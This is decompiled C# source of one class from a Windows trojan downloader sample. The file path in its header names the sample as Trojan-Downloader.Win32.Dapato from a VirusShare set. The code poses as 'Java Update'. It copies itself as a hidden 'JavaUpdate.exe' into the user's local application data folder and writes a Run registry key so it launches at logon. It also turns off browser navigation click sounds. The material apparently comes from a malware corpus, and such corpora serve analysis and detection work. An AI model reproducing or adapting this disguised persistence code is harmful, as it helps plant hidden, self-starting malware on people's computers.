// Decompiled with JetBrains decompiler // Type: browser_bastan.Araclar // Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe using Microsoft.Win32; using System; using System.IO; using System.Reflection; using System.Runtime.InteropServices; namespace browser_bastan { public sealed class Araclar { private const string RegKey = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"; private const int FEATURE_DISABLE_NAVIGATION_SOUNDS = 21; private const int SET_FEATURE_ON_PROCESS = 2; public static string Regkeyname = "Java Update"; public static string DstName = "JavaUpdate.exe"; [DllImport("urlmon.dll")] [return: MarshalAs(UnmanagedType.Error)] private static extern int CoInternetSetFeatureEnabled( int FeatureEntry, [MarshalAs(UnmanagedType.U4)] int dwFlags, bool fEnable); public static void DisableClickSounds() => Araclar.CoInternetSetFeatureEnabled(21, 2, true); public static void Copy(string src, string dst) { if (File.Exists(dst)) File.SetAttributes(dst, FileAttributes.Normal); try { File.Copy(src, dst, true); } catch (Exception ex) { } File.SetAttributes(dst, FileAttributes.Hidden); } public static void Startup(string name, string path) { RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); if (registryKey == null) return; registryKey.SetValue(name, (object) path); registryKey.Close(); } public static void DstCheck() { string location = Assembly.GetExecutingAssembly().Location; string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); if (Path.GetDirectoryName(location) == folderPath) return; Araclar.Copy(location, folderPath + "\\" + Araclar.DstName); } } }